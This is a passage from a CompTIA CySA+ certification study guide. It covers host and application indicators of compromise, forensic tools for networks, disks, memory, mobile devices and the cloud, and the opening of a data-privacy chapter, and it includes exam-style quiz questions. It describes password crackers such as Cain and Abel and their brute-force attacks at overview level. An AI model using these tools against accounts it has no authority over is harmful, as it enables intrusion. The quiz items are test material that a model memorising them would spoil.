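As a sketch only, assuming the AppLocker PowerShell cmdlets present on supported Windows editions (the directory and output file here are examples), you can inventory installed executables and generate whitelist rules from what you find:

Get-AppLockerFileInformation -Directory 'C:\Program Files' -Recurse |
    New-AppLockerPolicy -RuleType Publisher,Hash -User Everyone -Xml |
    Out-File .\AppLockerPolicy.xml

The resulting XML can be reviewed and then imported into a Group Policy object for wider deployment.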
Malicious Process
Malicious programs use processes to access the CPU, just as
legitimate programs do; processes working on behalf of malware
are considered malicious processes. You can sometimes locate
processes that are consuming excessive CPU or memory by using
Task Manager, but many malware programs don't show up in Task
Manager. Process Explorer or some other tool may give better
results. If you locate an offending process and end it, don't
forget that the program is still there; you need to locate it and
delete all of its associated files and registry entries.
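For quick triage, a minimal PowerShell sketch (no extra tools assumed) lists the top CPU consumers along with each image path, which helps spot processes running from unusual locations:

Get-Process | Sort-Object CPU -Descending | Select-Object -First 10 Name, Id, CPU, Path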
Unauthorized Change
If an organization has a robust change control process, there
should be no unauthorized changes made to devices. Whenever
a user reports an unauthorized change in his device, it should be
investigated. Many malicious programs make changes that may
be apparent to the user. Missing files, modified files, new menu
options, strange error messages, and odd system behavior are
all indications of unauthorized changes.
Unauthorized Privilege
Unauthorized changes can be the result of privilege escalation.
Check all system accounts for changes to the permissions and
rights that should be assigned, paying special attention to new
accounts with administrative privileges. When assigning
permissions, always exercise the concept of least privilege. Also
ensure that account reviews take place on a regular basis to
identify privileges that have been escalated and accounts that
are no longer needed.
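As a quick check with a built-in Windows command, you can list the members of the local Administrators group and review it for accounts that should not be there:

net localgroup Administrators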
Data Exfiltration
Data exfiltration is the theft of data from a device. Any
reports of missing or deleted data should be investigated. In
some cases, the data may still be present, but it has been copied
and transmitted to the attacker. Software tools are available to
help track the movement of data in transmissions.
Abnormal OS Process Behavior
When an operating system is behaving strangely and not
operating normally, it could be that the operating system needs
to be reinstalled or that it has been compromised by malware in
some way. While all operating systems occasionally have issues,
persistent issues or issues that are typically not seen or have
never been seen could indicate a compromised operating
system.
File System Change or Anomaly
Changes to the file system, especially to system files (those that
are part of the operating system), are not a good sign. System
files should not change from the day the operating system was
installed, and if they do, it is an indication of malicious activity.
Many systems offer the ability to verify the integrity of system
files. For example, the System File Checker (SFC) is a utility
built into the Windows 10 operating system that will check for
and repair operating system file corruption.
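For example, SFC is run from an elevated command prompt as follows; it verifies all protected system files and repairs those it can:

sfc /scannow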
Registry Change or Anomaly
Most registry changes are made indirectly, using tools such as
Control Panel; changes are rarely made directly with the
Registry Editor. Changes to registry settings
are common when a compromise has occurred. Changes to the
registry are not obvious and can remain hidden for long periods
of time. You need tools to help identify infected settings in the
registry and to identify the last saved settings. Examples include
Microsoft’s Sysinternals Autoruns and Silent Runners.vbs.
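As a minimal sketch using only the built-in reg utility (Autoruns inspects far more locations than these two keys), you can dump the common autostart keys for review:

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run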
Unauthorized Scheduled Task
In some cases, malware can generate a task that is scheduled to
occur on a regular basis, like communicating back to the hacker
at certain intervals or copying file locations at certain intervals.
Any scheduled task that was not configured by the local team is
a sign of compromise. Access to Scheduled Tasks can be
controlled through the use of Group Policy.
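With the built-in schtasks utility, a verbose listing shows each task's author and the command it runs, which can then be compared against what the local team has actually configured:

schtasks /query /fo LIST /v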
APPLICATION-RELATED INDICATORS OF
COMPROMISE
In some cases, symptoms are not present on the network or in
the activities of the host operating system, but they are present
in the behavior displayed by a compromised application. Some
of these indicators are covered in the following sections.
Anomalous Activity
When an application is behaving strangely and not operating
normally, it could be that the application needs to be reinstalled
or that it has been compromised by malware in some way.
While all applications occasionally have issues, persistent issues
or issues that are typically not seen or have never been seen
could indicate a compromised application.
Introduction of New Accounts
Some applications have their own account database. In that
case, you may find accounts that didn’t previously exist in the
database—and this should be a cause for alarm and
investigation. Many application compromises create accounts
with administrative access for the use of a malicious individual
or for the processes operating on his behalf.
Unexpected Output
When the output from a program is not what is normally
expected, when dialog boxes are altered, or when the boxes are
displayed in the wrong order, it is an indication that the
application has been altered. Reports of strange output should
be investigated.
Unexpected Outbound Communication
Any unexpected outbound traffic should be investigated,
regardless of whether it was discovered as a result of network
monitoring or as a result of monitoring the host or application.
With regard to the application, it can mean that data is being
transmitted back to the malicious individual.
Service Interruption
When an application stops functioning with no apparent
problem, or when an application cannot seem to communicate
in the case of a distributed application, it can be a sign of a
compromised application. Any such interruptions that cannot
be traced to an application, host, or network failure should be
investigated.
Application Log
Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities,” covered the event logs in Windows. One of those
event logs is dedicated to errors and issues related to
applications, the Application log. This log focuses on the
operation of Windows applications. Events in this log are
classified as error, warning, or information, depending on the
severity of the event. The Application log in Windows 10 is
shown in Figure 17-5.
Figure 17-5 Application Log
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 17-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 17-2 Key Topics for Chapter 17

Key Topic Element   Description                                        Page Number
Bulleted list       Dangers of irregular peer-to-peer communication    474
Bulleted list       Types of illegitimate devices                      475
Bulleted list       Preventing rogue devices                           475
Bulleted list       Scan and sweep types                               476
Bulleted list       Legitimate reasons for traffic spikes              476
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
indicators of compromise (IoCs)
beaconing
traditional botnet
peer-to-peer botnet
wireless key loggers
rogue device
wireless intrusion prevention system (WIPS)
ping sweeps
port scans
vulnerability scans
uncredentialed scan
data exfiltration
Application log
REVIEW QUESTIONS
1. __________________ refers to traffic that leaves a
network at regular intervals.
2. List at least two network-related IoCs.
3. Match the following terms with their definitions.

Terms:
Beaconing
Data exfiltration
Rogue device
IoC

Definitions:
Behavior that indicates a possible compromise
Device you do not control
Data loss through the network
Traffic that leaves a network at regular intervals
4. The ____________________ focuses on the operation
of Windows applications.
5. List at least two host-related IoCs.
6. Match the following terms with their definitions.

Terms:
Peer-to-peer botnet
Traditional botnet
Wireless key logger
Wireless intrusion prevention system (WIPS)

Definitions:
Collects information and transmits it to the criminal via Bluetooth or Wi-Fi
Botnet in which devices that can be reached externally are compromised and run server software that turns them into command and control servers for the devices that are recruited internally that cannot communicate with the command and control server operating externally
Not only can alert you when any unknown device is in the area (APs and stations) but can take a number of actions
Botnet in which all the zombies communicate directly with the command and control server, which is located outside the network
7. _________________ enables you to look at graphs
similar to those in Task Manager and identify what caused
spikes in the past, which is not possible with Task Manager
alone.
8. List at least two application-related IoCs.
9. Match the following terms with their definitions.

Terms:
Ping sweep
Port scan
Vulnerability scan
Uncredentialed scan

Definitions:
Locates vulnerabilities in systems
Scanner lacks administrative privileges on the device it is scanning
Attempts to connect to every port on each device and report which ports are open, or “listening”
Uses ICMP to identify all live hosts by pinging all IP addresses in the known network
10. A(n) ______________________ is a scan in which the
scanner lacks administrative privileges on the device it is
scanning.
Chapter 18
Utilizing Basic Digital
Forensics Techniques
This chapter covers the following topics related to Objective 4.4
(Given a scenario, utilize basic digital forensics techniques) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Network: Covers network protocol analyzing tools including
Wireshark and tcpdump.
Endpoint: Discusses disk and memory digital forensics.
Mobile: Covers mobile forensics techniques.
Cloud: Includes forensic techniques in the cloud.
Virtualization: Covers issues and forensics unique to
virtualization.
Legal hold: Describes the legal concept of retaining information
for legal purposes.
Procedures: Covers forensic procedures.
Hashing: Describes forensic verification, including changes to
binaries.
Carving: Describes the process of carving that allows the recovery
of files.
Data acquisition: Covers data acquisition processes.
Over time, techniques have been developed to perform a
forensic examination of a compromised system or network.
Security professionals should use these time-tested processes to
guide the approach to gathering digital evidence. This chapter
explores many of these basic techniques.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 18-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 18-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping

Foundation Topics Section   Question
Network                     1
Endpoint                    2
Mobile                      3
Cloud                       4
Virtualization              5
Legal Hold                  6
Procedures                  7
Hashing                     8
Carving                     9
Data Acquisition            10
1. Which of the following is a packet analyzer?
1. Wireshark
2. FTK
3. Helix
4. Cain and Abel
2. Which of the following is a password cracking tool?
1. Wireshark
2. FTK
3. Helix
4. Cain and Abel
3. Which of the following is a data acquisition tool?
1. MD5
2. EnCase
3. Cellebrite
4. dd
4. Which of the following is not true of the cloud-based
approach to vulnerability scanning?
1. Installation costs are lower than with a premises-based solution.
2. Maintenance costs are higher than with a premises-based
solution.
3. Upgrades are included in a subscription.
4. It does not require the client to provide onsite equipment.
5. Which of the following is false with respect to using forensic
tools for the virtual environment?
1. The same tools can be used as in a physical environment.
2. Knowledge of the files that make up a VM is critical.
3. Requires deep knowledge of the log files created by the various
components.
4. Requires access to the hypervisor code.
6. Which of the following often requires that organizations
maintain archived data for longer periods?
1. Chain of custody
2. Lawful intercept
3. Legal hold
4. Discovery
7. Which of the following items in a digital forensic
investigation suite is used to make copies of a hard drive?
1. Imaging utilities
2. Analysis utilities
3. Hashing utilities
4. Password crackers
8. Which of the following is the strongest hashing utility?
1. MD5
2. MD6
3. SHA-1
4. SHA-3
9. Which of the following types of file carving is not supported
by Forensic Explorer?
1. Cluster-based file carving
2. Sector-based file carving
3. Byte-based file carving
4. Partition-based file carving
10. Which of the following is a data acquisition tool for
smartphones?
1. MD5
2. EnCase
3. Cellebrite
4. dd
FOUNDATION TOPICS
NETWORK
During both environmental reconnaissance testing and when
performing forensic investigations, security analysts have a
number of tools at their disposal, and it’s no coincidence that
many of them are the same tools that hackers use. The following
sections cover the most common network tools and describe the
types of information you can determine about the security of the
environment by using each tool.
Wireshark
A packet (or protocol) analyzer can be a standalone device or
software running on a laptop computer. One of the most widely
used software-based protocol analyzers is Wireshark. It
captures raw packets off the interface on which it is configured
and allows you to examine each packet. If the data is
unencrypted, you can read the data. Figure 18-1 shows an
example of Wireshark in use. You can use a protocol analyzer to
capture traffic flowing through a network switch by using the
port mirroring feature of a switch. You can then examine the
captured packets to discern the details of communication flows.
Figure 18-1 Wireshark
In the output shown in Figure 18-1, each line represents a
packet captured on the network. You can see the source IP
address, the destination IP address, the protocol in use, and the
information in the packet. For example, line 511 shows a packet
from 10.68.26.15 to 10.68.26.127, which is a NetBIOS name
resolution query. Line 521 shows an HTTP packet from
10.68.26.46 to a server at 108.160.163.97. Just after that, you
can see the server sending an acknowledgment back. To read a
packet, you click the single packet. If the data is cleartext, you
can read and analyze it. So you can see how an attacker could
use Wireshark to acquire credentials and other sensitive
information. Protocol analyzers can be of help whenever you
need to see what is really happening on your network. For
example, say you have a security policy that mandates certain
types of traffic should be encrypted, but you are not sure that
everyone is complying with this policy. By capturing and
viewing the raw packets on the network, you can determine
whether users are compliant.
Figure 18-2 shows additional output from Wireshark. The top
panel shows packets that have been captured. The line
numbered 384 has been chosen, and the parts of the packet are
shown in the middle pane. In this case, the packet is a response
from a DNS server to a device that queried for a resolution. The
bottom pane shows the actual data in the packet and, because
this packet is not encrypted, you can see that the user was
requesting the IP address for www.cnn.com. Any packet not
encrypted can be read in this pane.
Figure 18-2 Analyzing Wireshark Output
During environmental reconnaissance testing, you can use
packet analyzers to identify traffic that is unencrypted but
should be encrypted (as previously mentioned), protocols that
should not be in use on the network, and other abnormalities.
You can also use these tools to recognize certain types of
attacks. Figure 18-3 shows Wireshark output that indicates
a SYN flood attack is underway. Notice the lines
highlighted in gray: these are all SYN packets sent to 10.1.0.2,
and they are part of a SYN flood. Notice that the target device is
answering with RST/ACK packets, which indicates that the port
is closed (lines highlighted in red). One of the SYN packets
(highlighted in blue) is selected, so you can view its details in the
bottom pane. You can expand this pane and read the
information from all four layers of the TCP/IP model. Currently
the transport layer is expanded.
Figure 18-3 SYN Flood Displayed in Wireshark
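As an aside, a standard Wireshark display filter along the following lines isolates packets with SYN set and ACK clear, making a suspected SYN flood stand out immediately:

tcp.flags.syn == 1 && tcp.flags.ack == 0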
tcpdump
tcpdump is a command-line tool that can capture packets on
Linux and Unix platforms. A version for Windows, windump, is
available as well. Using it is a matter of selecting the correct
parameter to go with the tcpdump command. For example, the
following command enables a capture (-i) on the Ethernet 0
interface.
tcpdump -i eth0
To explore the many other switches that are available for
tcpdump, see www.tcpdump.org/tcpdump_man.html.
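For instance, the following examples (the interface, host, and filename are placeholders) write a capture to a file and then read it back for offline analysis; the -nn option suppresses name and port resolution:

tcpdump -i eth0 -w capture.pcap host 10.1.0.2
tcpdump -nn -r capture.pcap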
ENDPOINT
Forensic tools are used in the process of collecting evidence
during a cyber investigation. Many of these tools are used to
obtain evidence from endpoints. Included in this category are
forensic investigation suites, hashing utilities, password
cracking tools, and imaging tools.
Disk
Many tools are dedicated to retrieving evidence from a hard
drive. Others are used to work with the data found on the hard
drive. The following tools are all related in some form or fashion
to obtaining evidence from a hard drive.
FTK
Forensic Toolkit (FTK) is a commercial toolkit that can scan
a hard drive for all sorts of information. This kit also includes an
imaging tool and an MD5 hashing utility. It can locate relevant
evidence, such as deleted e-mails. It also includes a password
cracker and the ability to work with rainbow tables.
For more information on FTK, see
https://accessdata.com/products-services/forensic-toolkit-ftk.
Helix3
Helix3 comes as a live CD that can be mounted on a host
without affecting the data on the host. From the live CD you can
acquire evidence and make drive images. This product is sold on
a subscription basis by e-fense.
For more information on Helix3, see www.efense.com/products.php.
Password Cracking
In the process of executing a forensic investigation, it may be
necessary to crack passwords. Often files have been encrypted
or password protected by malicious individuals, and you need to
attempt to recover the password. There are many, many
password cracking utilities out there; the following are two of
the most popular ones:
John the Ripper: John the Ripper is a password cracker that can
work in Unix/Linux as well as macOS systems. It detects weak Unix
passwords, though it supports hashes for many other platforms as
well. John the Ripper is available in three versions: an official free
version, a community-enhanced version (with many contributed
patches but not as much quality assurance), and an inexpensive pro
version. A related password cracker for Windows is Hash Suite.
Cain and Abel: One of the most well-known password cracking
programs, Cain and Abel can recover passwords by sniffing the
network; crack encrypted passwords using dictionary, brute-force,
and cryptanalysis attacks; record VoIP conversations; decode
scrambled passwords; reveal password boxes; uncover cached
passwords; and analyze routing protocols. Figure 18-4 shows
sample output from this tool. As you can see, an array of attacks can
be performed on each located account. This example shows a scan
of the local machine for user accounts in which the program has
located three accounts: Admin, Sharpy, and JSmith. By right-clicking the Admin account, you can use the program to perform a
brute-force attack—or a number of other attacks—on that account.
Figure 18-4 Cain and Abel
Imaging
Before you perform any analysis on a target disk in an
investigation, you should make a bit-level image of the disk so
that you can conduct the analysis on that copy. Therefore, a
forensic imaging utility should be part of your toolkit. There
are many forensic imaging utilities, and many of the forensic
investigation suites contain them. Moreover, many commercial
forensic workstations have these utilities already loaded.
The dd command is a Linux command used to convert
and copy files. The U.S. Department of Defense created a fork (a
variation) of this command called dcfldd that adds additional
forensic functionality. By using dd with the proper
parameters and the correct syntax, you can make an image of a
disk, but dcfldd enables you to also generate a hash of the
source disk at the same time. For example, the following
command reads 5 GB at a time from the source drive and writes
it to a file called myimage.dd.aa:
dcfldd if=/dev/sourcedrive hash=md5,sha256 hashwindow=5G \
    md5log=hashmd5.txt sha256log=hashsha.txt \
    hashconv=after bs=512 conv=noerror,sync \
    split=5G splitformat=aa of=myimage.dd
This example also calculates the MD5 hash and the SHA-256
hash of the 5-GB chunk. It then reads the next 5 GB and names
that myimage.dd.ab. The MD5 hashes are stored in a file called
hashmd5.txt, and the SHA-256 hashes are stored in a file called
hashsha.txt. The block size for transferring has been set to 512
bytes, and in the event of read errors, dcfldd writes zeros.
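As a follow-up sketch (using the filenames from the example above), the split pieces can later be reassembled and re-hashed, and the result compared against the values dcfldd recorded in hashmd5.txt, to demonstrate that the image has not changed:

cat myimage.dd.* | md5sum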
Memory
Many penetration testing tools perform an operation called a
core dump or memory dump. Applications store information in
memory, and this information can include sensitive data,
passwords, usernames, and encryption keys. Hackers can use
memory-reading tools to analyze the entire memory content
used by an application. Any vulnerability testing should take
this into consideration and utilize the same tools to identify any
issues in the memory of an application. The following are some
examples of memory-reading tools:
Memdump: This free tool runs on Windows, Linux, and Solaris. It
simply creates a bit-by-bit copy of the volatile memory on a system.
KnTTools: This memory acquisition and analysis tool used with
Windows systems captures physical memory and stores it to a
removable drive or sends it over the network to be archived on a
separate machine.
FATKit: This popular memory forensic tool automates the process
of extracting interesting data from volatile memory. FATKit helps
an analyst visualize the objects it finds to help in understanding the
data that the tool was able to find.
Runtime debugging, on the other hand, is the process of
using a programming tool to not only identify syntactic
problems in code but also discover weaknesses that can lead to
memory leaks and buffer overflows. Runtime debugging tools
operate by examining and monitoring the use of memory. These
tools are specific to the language in which the code was written.
Table 18-2 shows examples of runtime debugging tools and the
operating systems and languages for which they can be used.
Table 18-2 Runtime Debugging Tools

Tool                                           Operating Systems          Languages
AddressSanitizer                               Linux, macOS               C, C++
Deleaker                                       Windows (Visual Studio)    C, C#
OutputDebugString Checker by Software Verify   Windows                    .NET, C, C++, Java, JavaScript, Lua, Python, Ruby
Memory dumping can help determine what a hacker might be
able to learn if she were able to cause a memory dump. Runtime
debugging would be the correct approach for discovering
syntactic problems in an application’s code or to identify other
issues, such as memory leaks or potential buffer overflows.
MOBILE
As the use of mobile devices has increased, so has the
involvement of these devices in security incidents. The following
tools, among others, have been created to help obtain evidence
from mobile devices:
Cellebrite: Cellebrite has found a niche by focusing on collecting
evidence from smartphones. It makes extraction devices that can be
used in the field and software that does the same things. These
extraction devices collect metadata from memory and attempt to
access the file system by bypassing the lock mechanism. They don’t
modify any of the data on the devices, which makes this a
forensically “clean” solution. The device looks like a tablet, and you
simply connect a phone to it via USB. For more information, see
https://www.cellebrite.com.
Susteen Secure View 4: This mobile forensic tool is used by
many police departments. It enables users to fully export and report
on all information found on the mobile device. It can create
evidence reports based only on the information that you find
relevant to your case. This includes deleted data, all files (pictures,
videos, documents, etc.), messages, and more. See
https://www.secureview.us/ for details.
MSAB XRY: This digital forensics and mobile device forensics
product by the Swedish company MSAB is used to analyze and
recover information from mobile devices such as mobile phones,
smartphones, GPS navigation tools, and tablet computers. Check
out XRY at https://www.msab.com/products/xry/.
CLOUD
In Chapter 4, “Analyzing Assessment Output,” you learned
about some cloud tools for vulnerability assessments, and in
Chapter 8, “Security Solutions for Infrastructure Management,”
you learned about cloud anti-malware systems. Let’s look a bit
more at cloud vulnerability scanning.
Cloud-based vulnerability scanning is a service performed from
the vendor’s cloud and is a good example of Software as a
Service (SaaS). The benefits here are the same as the benefits
derived from any SaaS offering—that is, no equipment on the
part of the subscriber and no footprint in the local network.
Figure 18-5 shows a premises-based approach to vulnerability
scanning, and Figure 18-6 shows a cloud-based solution. In the
premises-based approach, the hardware and/or software
vulnerability scanners and associated components are entirely
installed on the client premises, while in the cloud-based
approach, the vulnerability management platform is in the
cloud. Vulnerability scanners for external vulnerability
assessments are located at the solution provider’s site, with
additional scanners on the premises.
Figure 18-5 Premises-Based Scanning
FIGURE 18-6 Cloud-Based Scanning
The following are the advantages of the cloud-based approach:
Installation costs are low because there is no installation and
configuration for the client to complete.
Maintenance costs are low because there is only one centralized
component to maintain, and it is maintained by the vendor (not the
end client).
Upgrades are included in a subscription.
Costs are distributed among all customers.
It does not require the client to provide onsite equipment.
However, there is a considerable disadvantage to the cloud-based approach: Whereas premises-based deployments store
data findings at the organization’s site, in a cloud-based
deployment, the data is resident with the provider. This means
the customer is dependent on the provider to ensure the
security of the vulnerability data.
Qualys is an example of a cloud-based vulnerability scanner.
Sensors are placed throughout the network, and they upload
data to the cloud for analysis. Sensors can be implemented as
dedicated appliances or as software instances on a host. A third
option is to deploy sensors as images on virtual machines.
VIRTUALIZATION
In Chapter 8, you learned the basics of virtualization and how
this technology is used in the cloud environment. With respect
to forensic tools for the virtual environment, the same tools can
be used as in a physical environment. However, the key is
knowledge of the files that make up a VM and how to locate
these files. Each virtualization system has its own filenames and
architecture. Each VM is made up of several files.
Another key aspect of successful forensics in the virtual
environment is deep knowledge of the log files created by the
various components such as the hypervisor and the guest
machine. You need to know not only where these files are
located but also the purpose of each and how to read and
interpret its entries.
LEGAL HOLD
Legal holds are requirements placed on organizations by legal
authorities that require the organization to maintain archived
data for longer periods. Data on a legal hold must be properly
identified, and the appropriate security controls must be put
into place to ensure that the data cannot be tampered with or
deleted. An organization should have policies regarding any
legal holds that may be in place.
Consider the following scenario: An administrator receives a
notification from the legal department that an investigation is
being performed on members of the research department, and
the legal department has advised a legal hold on all documents
for an unspecified period of time. Most likely this legal hold will
conflict with the organization's data storage policy and data
retention policy. If a situation like this arises, the IT staff should
document the decision and take the appropriate steps to ensure
that the data is retained and stored for a longer period, if
needed.
PROCEDURES
In Chapter 16, “Applying the Appropriate Incident Response
Procedure,” you learned about the incident response process
and its steps. Review those steps as they are important. This
section introduces some case management tools that can make
the process go smoother.
EnCase Forensic
EnCase Forensic is a case (incident) management tool that
offers built-in templates for specific types of investigations.
These templates are based on workflows, which are the steps to
carry out based on the investigation type. A workflow leads you
through the steps of triage, collection, decryption, processing,
investigation, and reporting of an incident. For more
information, see https://www.guidancesoftware.com/encaseforensic.
Sysinternals
Sysinternals is a suite of more than 70 Windows utilities
that can be used for both troubleshooting and security issues.
Among these are forensic tools. For more information, see
https://technet.microsoft.com/en-us/sysinternals/.
Forensic Investigation Suite
A forensic investigation suite is a collection of tools that
are commonly used in digital forensic investigations. A quality
forensic investigation suite should include the following items:
Imaging utilities: One of the tasks you will be performing is
making copies of storage devices. For this you need a disk imaging
tool. To make system images, you need to use a tool that creates a
bit-level copy of the system. In most cases, you must isolate the
system and remove it from production to create this bit-level copy.
You should ensure that two copies of the image are retained. One
copy of the image will be stored to ensure that an undamaged,
accurate copy is available as evidence. The other copy will be used
during the examination and analysis steps. Message digests (or
hashing digests) should be used to ensure data integrity.
Analysis utilities: You need a tool to analyze the bit-level copy of
the system that is created by the imaging utility. Many of these tools
are available on the market. Often these tools are included in
forensic investigation suites and toolkits, such as the previously
introduced EnCase Forensic, FTK, and Helix.
Chain of custody: While hard copies of chain of custody activities
should be kept, some forensic investigation suites contain software
to help manage this process. These tools can help you maintain an
accurate and legal chain of custody for all evidence, with or without
hard copy (paper) backup. Some suites perform a dual electronic
signature capture that places both signatures in an Excel
spreadsheet as proof of transfer. Those signatures are doubly
encrypted so that if the spreadsheet is altered in any way, the
signatures disappear.
Hashing utilities: These utilities are covered in the next section.
OS and process analysis: These tools focus on the activities of
the operating system and the processes that have been executed.
While most operating systems have tools of some sort that can
report on processes, tools included in a forensic investigation suite
have more robust features and capabilities.
Mobile device forensics: Today, many incidents involve mobile
devices. You need different tools to acquire the required
information from these devices. A forensic investigation suite
should contain tools for this purpose. See the earlier “Mobile”
section for examples.
Password crackers: Many times investigators find passwords
standing in the way of obtaining evidence. Password cracking
utilities are required in such instances. Most forensic investigation
suites include several password cracking utilities for this purpose.
Chapter 4 lists some of these tools.
Cryptography tools: An investigator uses these tools when
encountering encrypted evidence, which is becoming more common.
Some of these tools can attempt to decrypt the most common types
of encryption (for example, BitLocker, BitLocker To Go, PGP,
TrueCrypt), and they may also be able to locate decryption keys
from RAM dumps and hibernation files.
Log viewers: Finally, because much evidence can be found in the
logs located on the device, a robust log reading utility is also
valuable. A log viewer should have the ability to read all Windows
logs as well as the registry. Moreover, it should also be able to read
logs created by other operating systems. See the “Log Review”
section of Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
HASHING
A hash function takes a message of variable length and produces
a fixed-length hash value. Hash values, also referred to as
message digests, are calculated using the original message. If
the receiver calculates a hash value that is the same, the original
message is intact. If the receiver calculates a hash value that is
different, then the original message has been altered. Hashing
was covered in Chapter 8.
Hashing Utilities
You must be able to prove that certain evidence has not been
altered during your possession of it. Hashing utilities use
hashing algorithms to create a value that can be used later to
verify that the information is unchanged. The two most
common algorithms used are Message Digest 5 (MD5) and
Secure Hashing Algorithm (SHA).
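For example, with the common coreutils hashing tools (the filename is a placeholder), a digest can be recorded at acquisition time and re-verified later:

sha256sum evidence.img > evidence.img.sha256
sha256sum -c evidence.img.sha256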
Changes to Binaries
A binary file is a computer file that is not a text file; the term
is often used simply to mean “non-text file.” Binary files must be
interpreted to be read, and executable files are often of this
type. These file types can be verified using hashing in the same
manner as described in the prior section.
CARVING
Data carving is a technique used when only fragments of data
are available and when no file system metadata is available. It is
a common procedure when performing data recovery, after a
storage device failure, for instance. It is also used in forensics.
A file signature is a constant numerical or text value used to
identify a file format. The object of carving is to identify the file
based on this signature information alone.
Forensic Explorer is a tool for the analysis of electronic evidence
and includes a data carving tool that searches for signatures. It
offers carving support for more than 300 file types. It supports
Cluster-based file carving
Sector-based file carving
Byte-based file carving
Figure 18-7 shows the File Carving dialog box in Forensic
Explorer.
Figure 18-7 File Carving in Forensic Explorer
DATA ACQUISITION
Earlier in this chapter, in the section “Forensic Investigation
Suite,” you learned about data acquisition tools that should be a
part of your forensic toolkit. Please review that section with
regard to forensic tools.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 18-3
lists a reference of these key topics and the page numbers on
which each is found.
Table 18-3 Key Topics in Chapter 18

Key Topic Element   Description                                                  Page Number
Figure 18-2         Analyzing Wireshark output                                   489
Bulleted list       Examples of memory-reading tools                             493
Figure 18-5         Premises-based scanning                                      495
Figure 18-6         Cloud-based scanning                                         496
Bulleted list       Advantages of the cloud-based approach                       496
Bulleted list       Tools commonly included in a forensic investigation suite    498
Section             Description of the data carving forensic technique           500
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Wireshark
tcpdump
Forensic Toolkit (FTK)
Helix
John the Ripper
Cain and Abel
imaging
dd
Memdump
KnTTools
FATKit
runtime debugging
Cellebrite
Qualys
legal hold
EnCase Forensic
Sysinternals
forensic investigation suite
carving
REVIEW QUESTIONS
1. ___________________ is a command-line tool that can
capture packets on Linux and Unix platforms.
2. List at least one password cracking utility.
3. Match the following terms with their definitions.

Terms:
Legal hold
Hashing
Carving
tcpdump

Definitions:
Forensic technique used when only fragments of data are available and when no file system metadata is available
Often requires that organizations maintain archived data for longer periods
A command-line tool that can capture packets on Linux and Unix platforms
Process used to determine the integrity of files
4. The DoD created a fork (a variation) of the dd command
called ___________ that adds additional forensic
functionality.
5. List at least two memory-reading tools.
6. Match the following terms with their definitions.

Terms:
Forensic Toolkit (FTK)
Helix
John the Ripper
dd

Definitions:
Live CD with which you can acquire evidence and make drive images
Linux command used to convert and copy files
A commercial toolkit that can scan a hard drive for all sorts of information
Password cracker that can work in Linux or Unix as well as macOS
7. Cellebrite found a niche by focusing on collecting evidence
from ______________.
8. List at least two advantages of the cloud-based approach to
vulnerability scanning.
9. Match the following terms with their definitions.

Terms:
Memdump
KnTTools
FATKit
Qualys

Definitions:
Memory acquisition and analysis tool used with Windows systems
A cloud-based vulnerability scanner
Memory forensic tool that automates the process of extracting interesting data from volatile memory
Free tool that runs on Windows, Linux, and Solaris and simply creates a bit-by-bit copy of the volatile memory on a system
10. _____________ often require that organizations
maintain archived data for longer periods.
Chapter 19
The Importance of Data
Privacy and Protection
This chapter covers the following topics related to Objective 5.1
(Understand the importance of data privacy and protection) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Privacy vs. security: Compares these two concepts as they relate
to data privacy and protection.
Non-technical controls: Describes classification, ownership,
retention, data types, retention standards, confidentiality, legal
requirements, data sovereignty, data minimization, purpose
limitation, and non-disclosure agreement (NDA).
Technical controls: Covers encryption, data loss prevention
(DLP), data masking, deidentification, tokenization, digital rights
management (DRM), geographic access requirements, and access
controls.
Addressing data privacy and protection issues has become one
of the biggest challenges facing organizations that handle the
information of employees, customers, and vendors. This chapter
explores those data privacy and protection issues and describes
the various controls that can be applied to mitigate them. New
data privacy laws that require new controls to protect data, such
as the EU General Data Protection Regulation (GDPR), are being
enacted regularly.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks.” Table 19-1
lists the major headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 19-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping

Foundation Topics Section   Questions
Privacy vs. Security        1, 2, 3
Non-technical Controls      4, 5, 6
Technical Controls          7, 8, 9
1. Which of the following relates to rights to control the
sharing and use of one’s personal information?
1. Security
2. Privacy
3. Integrity
4. Confidentiality
2. Which of the following is a risk assessment that determines
risks associated with PII collection?
1. MTA
2. PIA
3. RSA
4. SLA
3. Third-party personnel should be familiarized with
organizational policies related to data privacy and should
sign which of the following?
1. NDA
2. MOU
3. ICA
4. SLA
4. Which of the following is a measure of how freely data can
be handled?
1. Sensitivity
2. Privacy
3. Secrecy
4. Criticality
5. Which of the following affects any organizations that handle
cardholder information for the major credit card
companies?
1. GLBA
2. PCI DSS
3. SOX
4. HIPAA
6. Which of the following affects all healthcare facilities, health
insurance companies, and healthcare clearinghouses?
1. GLBA
